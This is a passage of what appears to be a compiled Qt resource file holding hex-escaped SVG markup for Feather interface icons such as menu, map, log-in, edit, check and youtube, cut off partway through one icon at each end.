\x6c\x31\x2e\x32\x32\x2d\x33\x2e\x37\x38\x20\x32\x2e\x34\x34\x2d\
\x37\x2e\x35\x31\x41\x2e\x34\x32\x2e\x34\x32\x20\x30\x20\x30\x20\
\x31\x20\x34\x2e\x38\x32\x20\x32\x61\x2e\x34\x33\x2e\x34\x33\x20\
\x30\x20\x30\x20\x31\x20\x2e\x35\x38\x20\x30\x20\x2e\x34\x32\x2e\
\x34\x32\x20\x30\x20\x30\x20\x31\x20\x2e\x31\x31\x2e\x31\x38\x6c\
\x32\x2e\x34\x34\x20\x37\x2e\x34\x39\x68\x38\x2e\x31\x6c\x32\x2e\
\x34\x34\x2d\x37\x2e\x35\x31\x41\x2e\x34\x32\x2e\x34\x32\x20\x30\
\x20\x30\x20\x31\x20\x31\x38\x2e\x36\x20\x32\x61\x2e\x34\x33\x2e\
\x34\x33\x20\x30\x20\x30\x20\x31\x20\x2e\x35\x38\x20\x30\x20\x2e\
\x34\x32\x2e\x34\x32\x20\x30\x20\x30\x20\x31\x20\x2e\x31\x31\x2e\
\x31\x38\x6c\x32\x2e\x34\x34\x20\x37\x2e\x35\x31\x4c\x32\x33\x20\
\x31\x33\x2e\x34\x35\x61\x2e\x38\x34\x2e\x38\x34\x20\x30\x20\x30\
\x20\x31\x2d\x2e\x33\x35\x2e\x39\x34\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x5a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x65\x6e\x75\x22\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\
\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\
\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\x3d\x22\x36\x22\
\x20\x78\x32\x3d\x22\x32\x31\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x33\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\x32\x3d\x22\
\x32\x31\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x65\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x6d\x69\x73\x73\x65\x64\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\
\x3d\x22\x31\x37\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x37\
\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\
\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\x31\x36\x2e\x39\
\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\
\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\x20\x31\x39\x2e\x37\x39\
\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\x33\x2d\x33\x2e\x30\x37\
\x20\x31\x39\x2e\x35\x20\x31\x39\x2e\x35\x20\x30\x20\x30\x20\x31\
\x2d\x36\x2d\x36\x20\x31\x39\x2e\x37\x39\x20\x31\x39\x2e\x37\x39\
\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x30\x37\x2d\x38\x2e\x36\x37\
\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x34\x2e\x31\x31\x20\
\x32\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\
\x31\x2e\x37\x32\x20\x31\x32\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\
\x20\x30\x20\x30\x20\x30\x20\x2e\x37\x20\x32\x2e\x38\x31\x20\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x2e\x34\x35\x20\x32\x2e\x31\
\x31\x4c\x38\x2e\x30\x39\x20\x39\x2e\x39\x31\x61\x31\x36\x20\x31\
\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x36\x6c\x31\x2e\x32\x37\
\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\x2e\x38\x34\x20\x31\
\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x32\x2e\x38\x31\x2e\
\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x32\x20\x31\
\x36\x2e\x39\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x75\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x61\x70\x22\x3e\
\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\
\x22\x31\x20\x36\x20\x31\x20\x32\x32\x20\x38\x20\x31\x38\x20\x31\
\x36\x20\x32\x32\x20\x32\x33\x20\x31\x38\x20\x32\x33\x20\x32\x20\
\x31\x36\x20\x36\x20\x38\x20\x32\x20\x31\x20\x36\x22\x3e\x3c\x2f\
\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\
\x38\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\
\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\
\x32\x3d\x22\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x59\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x2d\x6c\x69\x67\x68\x74\x6e\x69\x6e\x67\x22\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x31\x39\x20\x31\x36\x2e\x39\x41\x35\x20\
\x35\x20\x30\x20\x30\x20\x30\x20\x31\x38\x20\x37\x68\x2d\x31\x2e\
\x32\x36\x61\x38\x20\x38\x20\x30\x20\x31\x20\x30\x2d\x31\x31\x2e\
\x36\x32\x20\x39\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x33\x20\x31\x31\x20\x39\x20\x31\x37\x20\x31\x35\x20\x31\x37\x20\
\x31\x31\x20\x32\x33\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x70\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x6f\x67\x2d\x69\
\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x35\x20\
\x33\x68\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\
\x32\x76\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x20\x32\x68\x2d\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\
\x31\x30\x20\x31\x37\x20\x31\x35\x20\x31\x32\x20\x31\x30\x20\x37\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x31\
\x32\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x32\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x64\x69\x74\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x31\x20\x34\x48\
\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x32\x76\
\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\
\x68\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\
\x32\x76\x2d\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x2e\x35\x20\x32\x2e\x35\x61\
\x32\x2e\x31\x32\x31\x20\x32\x2e\x31\x32\x31\x20\x30\x20\x30\x20\
\x31\x20\x33\x20\x33\x4c\x31\x32\x20\x31\x35\x6c\x2d\x34\x20\x31\
\x20\x31\x2d\x34\x20\x39\x2e\x35\x2d\x39\x2e\x35\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x8f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x69\x67\x6e\
\x2d\x6a\x75\x73\x74\x69\x66\x79\x22\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\
\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x32\x31\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x33\
\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\
\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\
\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x38\
\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x38\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x64\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x65\x72\x74\
\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\
\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\
\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\
\x36\x22\x20\x78\x32\x3d\x22\x31\x32\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x06\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x63\x6b\
\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x32\x30\x20\x36\x20\x39\x20\x31\x37\x20\x34\x20\
\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x35\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x79\x6f\x75\x74\x75\
\x62\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\
\x2e\x35\x34\x20\x36\x2e\x34\x32\x61\x32\x2e\x37\x38\x20\x32\x2e\
\x37\x38\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x39\x34\x2d\x32\x43\
\x31\x38\x2e\x38\x38\x20\x34\x20\x31\x32\x20\x34\x20\x31\x32\x20\
\x34\x73\x2d\x36\x2e\x38\x38\x20\x30\x2d\x38\x2e\x36\x2e\x34\x36\
\x61\x32\x2e\x37\x38\x20\x32\x2e\x37\x38\x20\x30\x20\x30\x20\x30\
\x2d\x31\x2e\x39\x34\x20\x32\x41\x32\x39\x20\x32\x39\x20\x30\x20\
\x30\x20\x30\x20\x31\x20\x31\x31\x2e\x37\x35\x61\x32\x39\x20\x32\
\x39\x20\x30\x20\x30\x20\x30\x20\x2e\x34\x36\x20\x35\x2e\x33\x33\
\x41\x32\x2e\x37\x38\x20\x32\x2e\x37\x38\x20\x30\x20\x30\x20\x30\
\x20\x33\x2e\x34\x20\x31\x39\x63\x31\x2e\x37\x32\x2e\x34\x36\x20\
\x38\x2e\x36\x2e\x34\x36\x20\x38\x2e\x36\x2e\x34\x36\x73\x36\x2e\
\x38\x38\x20\x30\x20\x38\x2e\x36\x2d\x2e\x34\x36\x61\x32\x2e\x37\
\x38\x20\x32\x2e\x37\x38\x20\x30\x20\x30\x20\x30\x20\x31\x2e\x39\
\x34\x2d\x32\x20\x32\x39\x20\x32\x39\x20\x30\x20\x30\x20\x30\x20\
\x2e\x34\x36\x2d\x35\x2e\x32\x35\x20\x32\x39\x20\x32\x39\x20\x30\
\x20\x30\x20\x30\x2d\x2e\x34\x36\x2d\x35\x2e\x33\x33\x7a\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\x2e\x37\x35\x20\x31\x35\x2e\
\x30\x32\x20\x31\x35\x2e\x35\x20\x31\x31\x2e\x37\x35\x20\x39\x2e\
\x37\x35\x20\x38\x2e\x34\x38\x20\x39\x2e\x37\x35\x20\x31\x35\x2e\
\x30\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
